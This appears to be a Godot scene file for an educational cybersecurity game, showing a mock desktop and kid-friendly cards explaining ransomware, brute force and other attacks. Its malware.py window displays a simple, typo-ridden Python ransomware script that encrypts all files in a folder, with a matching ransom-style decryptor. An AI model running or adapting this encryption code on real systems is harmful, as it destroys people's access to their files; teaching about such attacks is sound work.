[gd_scene load_steps=11 format=3 uid="uid://jjhva651ce8b"]

[ext_resource type="Script" uid="uid://c336up6annq50" path="res://Scenes/GUI/Ransomware/desktop_default.gd" id="1_pekke"]
[ext_resource type="PackedScene" uid="uid://cnlake8o686ww" path="res://Scenes/GUI/CleanUI/icon.tscn" id="2_bikpg"]
[ext_resource type="Texture2D" uid="uid://clj3qe45uaet3" path="res://Assets/Illustrator/SQLIcon.png" id="3_qd57o"]
[ext_resource type="Texture2D" uid="uid://btcaebtnakb6o" path="res://Assets/Illustrator/ImageIcon.png" id="4_vlt0p"]
[ext_resource type="Texture2D" uid="uid://b0gtdkbrhcgjr" path="res://Assets/Illustrator/TextIcon.png" id="5_hyjlr"]
[ext_resource type="Texture2D" uid="uid://bxsekq15pnni8" path="res://Assets/Illustrator/PythonIcon.png" id="6_xxt4y"]
[ext_resource type="Script" path="res://Scripts/GUI/desktop.gd" id="7_pga4f"]
[ext_resource type="PackedScene" uid="uid://bcejk3vddejkh" path="res://Scenes/GUI/CleanUI/window.tscn" id="9_p75vd"]
[ext_resource type="Texture2D" uid="uid://bjymg66wnrrvo" path="res://icon.svg" id="10_o41mf"]
[ext_resource type="PackedScene" uid="uid://bd84mf3o5vdh5" path="res://Scenes/GUI/cyberattack_card.tscn" id="11_woodw"]

[node name="DesktopDefault" type="MarginContainer"]
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
grow_horizontal = 2
grow_vertical = 2
theme_override_constants/margin_left = 25
theme_override_constants/margin_top = 25
theme_override_constants/margin_right = 25
theme_override_constants/margin_bottom = 25
script = ExtResource("1_pekke")
metadata/_tab_index = 0

[node name="Desktop" type="VFlowContainer" parent="."]
layout_mode = 2
theme_override_constants/h_separation = 20

[node name="Data_icon" parent="Desktop" node_paths=PackedStringArray("window") instance=ExtResource("2_bikpg")]
layout_mode = 2
window = NodePath("../../WindowContainer/SQLWindow")

[node name="Button" parent="Desktop/Data_icon" index="0"]
icon = ExtResource("3_qd57o")

[node name="Label" parent="Desktop/Data_icon" index="1"]
text = "data.sql"

[node name="Godot_icon" parent="Desktop" node_paths=PackedStringArray("window") instance=ExtResource("2_bikpg")]
layout_mode = 2
window = NodePath("../../WindowContainer/GodotWindow")

[node name="Button" parent="Desktop/Godot_icon" index="0"]
icon = ExtResource("4_vlt0p")

[node name="Label" parent="Desktop/Godot_icon" index="1"]
text = "godot.png"

[node name="Text_icon" parent="Desktop" node_paths=PackedStringArray("window") instance=ExtResource("2_bikpg")]
layout_mode = 2
window = NodePath("../../WindowContainer/Text_1Window")

[node name="Button" parent="Desktop/Text_icon" index="0"]
icon = ExtResource("5_hyjlr")

[node name="Label" parent="Desktop/Text_icon" index="1"]
text = "text.txt"

[node name="Malware_icon" parent="Desktop" node_paths=PackedStringArray("window") instance=ExtResource("2_bikpg")]
layout_mode = 2
window = NodePath("../../WindowContainer/MalwareWindow")

[node name="Button" parent="Desktop/Malware_icon" index="0"]
icon = ExtResource("6_xxt4y")

[node name="Label" parent="Desktop/Malware_icon" index="1"]
text = "malware.py"

[node name="Decr_icon" parent="Desktop" node_paths=PackedStringArray("window") instance=ExtResource("2_bikpg")]
layout_mode = 2
window = NodePath("../../WindowContainer/DecryWindow")

[node name="Button" parent="Desktop/Decr_icon" index="0"]
icon = ExtResource("6_xxt4y")

[node name="Label" parent="Desktop/Decr_icon" index="1"]
text = "decr.py"

[node name="Key_icon" parent="Desktop" node_paths=PackedStringArray("window") instance=ExtResource("2_bikpg")]
layout_mode = 2
window = NodePath("../../WindowContainer/KeyWindow")

[node name="Button" parent="Desktop/Key_icon" index="0"]
icon = ExtResource("5_hyjlr")

[node name="Label" parent="Desktop/Key_icon" index="1"]
text = "key.key"

[node name="WindowContainer" type="Control" parent="." node_paths=PackedStringArray("cyberattack_lbl")]
layout_mode = 2
mouse_filter = 2
script = ExtResource("7_pga4f")
cyberattack_lbl = NodePath("Label")
ransomware_recon_done = true

[node name="GodotWindow" parent="WindowContainer" instance=ExtResource("9_p75vd")]
visible = false
layout_mode = 1
anchor_left = 0.392015
anchor_top = 0.162207
anchor_right = 0.95735
anchor_bottom = 0.737458

[node name="Title" parent="WindowContainer/GodotWindow/HBoxContainer" index="0"]
text = "godot.png"

[node name="TextureRect" type="TextureRect" parent="WindowContainer/GodotWindow/MarginContainer/VBoxContainer" index="0"]
custom_minimum_size = Vector2(-6.2, 260.78)
layout_mode = 2
texture = ExtResource("10_o41mf")

[node name="SQLWindow" parent="WindowContainer" instance=ExtResource("9_p75vd")]
visible = false
layout_mode = 1
anchor_left = 0.391107
anchor_top = 0.135452
anchor_right = 0.90326
anchor_bottom = 0.715698

[node name="Title" parent="WindowContainer/SQLWindow/HBoxContainer" index="0"]
text = "data.sql"

[node name="Label" type="Label" parent="WindowContainer/SQLWindow/MarginContainer/VBoxContainer" index="0"]
layout_mode = 2
text = "create database test;
use database test;

create table ransom(
      rid int auto_increment,
     rkey bigint not null
)"

[node name="Text_1Window" parent="WindowContainer" instance=ExtResource("9_p75vd")]
visible = false
layout_mode = 1
anchor_left = 0.342105
anchor_top = 0.0769231
anchor_right = 0.854258
anchor_bottom = 0.65717

[node name="Title" parent="WindowContainer/Text_1Window/HBoxContainer" index="0"]
text = "text.txt"

[node name="Label" type="Label" parent="WindowContainer/Text_1Window/MarginContainer/VBoxContainer" index="0"]
layout_mode = 2
text = "This text file is compose of your personal data such as:
-> Email Address and Passwords
-> Credit Card Number and Pin Numbers
-> Mobile Numbers"

[node name="KeyWindow" parent="WindowContainer" instance=ExtResource("9_p75vd")]
visible = false
layout_mode = 1
anchor_left = 0.364791
anchor_top = 0.167224
anchor_right = 0.916515
anchor_bottom = 0.714047
offset_left = -25.0
offset_top = -25.0
offset_right = -25.0
offset_bottom = -25.0

[node name="Title" parent="WindowContainer/KeyWindow/HBoxContainer" index="0"]
text = "key.key"

[node name="CodeEdit" type="CodeEdit" parent="WindowContainer/KeyWindow"]
layout_mode = 1
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
offset_left = 7.0
offset_top = 32.0
offset_right = -7.0
offset_bottom = -7.0
grow_horizontal = 2
grow_vertical = 2
theme_override_colors/background_color = Color(0, 0, 0, 0)
theme_override_colors/font_readonly_color = Color(1, 1, 1, 1)
editable = false

[node name="MalwareWindow" parent="WindowContainer" instance=ExtResource("9_p75vd")]
visible = false
layout_mode = 1
anchor_left = 0.392015
anchor_top = 0.262542
anchor_right = 0.92196
anchor_bottom = 0.884615

[node name="Title" parent="WindowContainer/MalwareWindow/HBoxContainer" index="0"]
text = "malware.py"

[node name="CodeEdit" type="CodeEdit" parent="WindowContainer/MalwareWindow"]
layout_mode = 1
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
offset_left = 7.0
offset_top = 32.0
offset_right = -7.0
offset_bottom = -7.0
grow_horizontal = 2
grow_vertical = 2
theme_override_colors/background_color = Color(0, 0, 0, 0)
theme_override_colors/font_readonly_color = Color(1, 1, 1, 1)
text = "import os from cryptography.fernet 
import fernet

allfiles = [ ]
for file in os.listdir():
	if file == 'malware.py' or file == 'key.key' or file == ' decr.py':
		continue
	if os.path.isfile(file):
		allfiles.append(file)
print (allfiles)

key = Fernet.generate_key()
with open ('key.key', 'wb') as thekey: 
	thekey.write(key)

for file in allfiles:
	with open(file, 'rb') as thefile:
		content = thefile.read()
	content_encryp = Fernet(key).encrypt(content)
	with open(file, 'wb') as thefile: 
		thefile.write(content_encryp)

print('All your files have been encrypted')"
editable = false

[node name="DecryWindow" parent="WindowContainer" instance=ExtResource("9_p75vd")]
visible = false
layout_mode = 1
anchor_left = 0.355717
anchor_top = 0.192308
anchor_right = 0.889292
anchor_bottom = 0.849498

[node name="Title" parent="WindowContainer/DecryWindow/HBoxContainer" index="0"]
text = "derc.py"

[node name="CodeEdit" type="CodeEdit" parent="WindowContainer/DecryWindow"]
layout_mode = 1
anchors_preset = 15
anchor_right = 1.0
anchor_bottom = 1.0
offset_left = 7.0
offset_top = 32.0
offset_right = -7.0
offset_bottom = -7.0
grow_horizontal = 2
grow_vertical = 2
theme_override_colors/background_color = Color(0, 0, 0, 0)
theme_override_colors/font_readonly_color = Color(1, 1, 1, 1)
text = "import os 
from cryptography.fernetimport fernet

allfiles = []
for file in os.listdir():
	if file == 'malware.py' or file == 'key.key' or file == 'decr.py':
		continue
	if os.path.isfile(file):
		allfiles.append(file)

print(allfiles)

with open('key.key', 'rb') as key:
		password = key.read()
passphrase = 'WhiteHat'
userpass = input('Enter the password you received from us:')

if userpass == passphrase:
	for file in allfiles:
		with open(file, 'rb') as thefile:
			 contents = thefile.read()
		content_decr = Fernet(password).decrypt(contents)
		with open(file, 'wb') as thefile:
 			thefile.write(content_decr)
		print(\"You got your files back\")
else: 
        print (\"Wrong password! Pay to receive the right password\")
"
editable = false

[node name="Label" type="Label" parent="WindowContainer"]
visible = false
layout_mode = 1
anchors_preset = -1
anchor_left = 0.45735
anchor_top = 0.961538
anchor_right = 0.504537
anchor_bottom = 1.0
offset_bottom = 6.10352e-05
grow_horizontal = 2
grow_vertical = 0
text = "simple"
metadata/_edit_use_anchors_ = true

[node name="DecryptedMessage" type="Label" parent="."]
visible = false
layout_mode = 2
size_flags_vertical = 8
theme_override_font_sizes/font_size = 22
text = "Now the files have been dencrypted. You can now access all the files"
metadata/_edit_use_anchors_ = true

[node name="Cyber_attack_Cards" type="ScrollContainer" parent="."]
layout_mode = 2

[node name="VBoxContainer" type="HBoxContainer" parent="Cyber_attack_Cards"]
layout_mode = 2

[node name="Ransomware_card" parent="Cyber_attack_Cards/VBoxContainer" instance=ExtResource("11_woodw")]
layout_mode = 2

[node name="Label" parent="Cyber_attack_Cards/VBoxContainer/Ransomware_card/MarginContainer/VBoxContainer" index="2"]
text = "Ransomware is a kind of harmful software that locks your files and asks for money to unlock them. Imagine someone putting a padlock on your school bag and saying you need to pay to get the key. It usually spreads through suspicious emails, links, or downloads, and once it’s in your computer, it blocks you from your own files. The problem is, even if you pay, there’s no promise you’ll get them back, which is why it’s so important to be careful online, keep backups, and update your devices.
"

[node name="Bruteforce_card" parent="Cyber_attack_Cards/VBoxContainer" instance=ExtResource("11_woodw")]
layout_mode = 2

[node name="Title" parent="Cyber_attack_Cards/VBoxContainer/Bruteforce_card/MarginContainer/VBoxContainer" index="0"]
text = "Bruteforce"

[node name="Label" parent="Cyber_attack_Cards/VBoxContainer/Bruteforce_card/MarginContainer/VBoxContainer" index="2"]
text = "A brute force attack is when someone tries to guess a password by testing every possible combination until they find the right one. It’s like trying every key on a keychain to open a locked door—slow but effective if the lock (or password) is weak. To prevent this change your password more frequently and use special characters."

[node name="Phishing_card" parent="Cyber_attack_Cards/VBoxContainer" instance=ExtResource("11_woodw")]
layout_mode = 2

[node name="Title" parent="Cyber_attack_Cards/VBoxContainer/Phishing_card/MarginContainer/VBoxContainer" index="0"]
text = "Phishing"

[node name="Fileless_card" parent="Cyber_attack_Cards/VBoxContainer" instance=ExtResource("11_woodw")]
layout_mode = 2

[node name="Title" parent="Cyber_attack_Cards/VBoxContainer/Fileless_card/MarginContainer/VBoxContainer" index="0"]
text = "Fileless"

[node name="DoS_card" parent="Cyber_attack_Cards/VBoxContainer" instance=ExtResource("11_woodw")]
layout_mode = 2

[node name="Title" parent="Cyber_attack_Cards/VBoxContainer/DoS_card/MarginContainer/VBoxContainer" index="0"]
text = "Denial of Services"

[connection signal="pressed" from="Cyber_attack_Cards/VBoxContainer/Ransomware_card/Button" to="." method="_ransomware_pressed"]
[connection signal="pressed" from="Cyber_attack_Cards/VBoxContainer/Bruteforce_card/Button" to="." method="_bruteforce_pressed"]
[connection signal="pressed" from="Cyber_attack_Cards/VBoxContainer/Phishing_card/Button" to="." method="_phishing_pressed"]
[connection signal="pressed" from="Cyber_attack_Cards/VBoxContainer/Fileless_card/Button" to="." method="_fileless_pressed"]
[connection signal="pressed" from="Cyber_attack_Cards/VBoxContainer/DoS_card/Button" to="." method="_dos_pressed"]

[editable path="Desktop/Data_icon"]
[editable path="Desktop/Godot_icon"]
[editable path="Desktop/Text_icon"]
[editable path="Desktop/Malware_icon"]
[editable path="Desktop/Decr_icon"]
[editable path="Desktop/Key_icon"]
[editable path="WindowContainer/GodotWindow"]
[editable path="WindowContainer/SQLWindow"]
[editable path="WindowContainer/Text_1Window"]
[editable path="WindowContainer/KeyWindow"]
[editable path="WindowContainer/MalwareWindow"]
[editable path="WindowContainer/DecryWindow"]
[editable path="Cyber_attack_Cards/VBoxContainer/Ransomware_card"]
[editable path="Cyber_attack_Cards/VBoxContainer/Bruteforce_card"]
[editable path="Cyber_attack_Cards/VBoxContainer/Phishing_card"]
[editable path="Cyber_attack_Cards/VBoxContainer/Fileless_card"]
[editable path="Cyber_attack_Cards/VBoxContainer/DoS_card"]
